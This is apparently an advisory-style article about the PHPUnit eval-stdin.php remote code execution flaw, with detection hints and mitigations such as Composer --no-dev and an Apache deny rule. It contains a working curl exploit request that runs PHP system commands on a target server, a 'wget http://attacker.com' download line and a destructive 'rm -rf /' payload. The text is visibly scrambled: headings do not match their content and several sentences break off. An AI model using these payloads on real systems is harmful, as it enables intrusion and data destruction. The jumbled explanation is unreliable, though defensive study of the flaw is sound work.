vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php exploit (updated June 2026)
vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
This script was designed to support PHPUnit's internal testing process: it reads PHP code from standard input (here, the HTTP request body) and evaluates it. It has no authentication or access control of any kind. If the vendor directory is reachable through the web server, anyone who can send an HTTP request to this file can execute arbitrary PHP code with the privileges of the web server process.

Vulnerable Versions
The attacker can replace `ls -la` with commands that install a backdoor, download malware, or exfiltrate data, such as:

    wget http://attacker.com
    system("rm -rf /");   (destructive)

Real-World Impact: Why It Still Matters in 2026
    curl -X POST https://victim.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \
      -H "Content-Type: application/x-www-form-urlencoded" \
      -d "<?php system('id'); ?>"
Use Composer with the --no-dev flag so that development-only dependencies such as PHPUnit are never installed on production systems:
When a developer installs PHPUnit via Composer, the vendor directory is created. If this directory is placed inside the web root (e.g., public_html or /var/www/html) and served over HTTP, anyone on the internet can send a request to this file.

Execution Flow
The attack signature was distinctive: POST requests to /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php with raw PHP code in the request body.
Look for GET or POST requests to paths containing:
If this file is left accessible in a web-accessible directory (like a public folder), an attacker can send a
    <Directory "/path/to/vendor">
        Require all denied
    </Directory>
This vulnerability is covered by a module in the Metasploit Framework (exploit/multi/http/phpunit_eval_stdin), so exploitation requires no skill on the attacker's part and any exposed instance should be assumed to be targeted by automated scanning.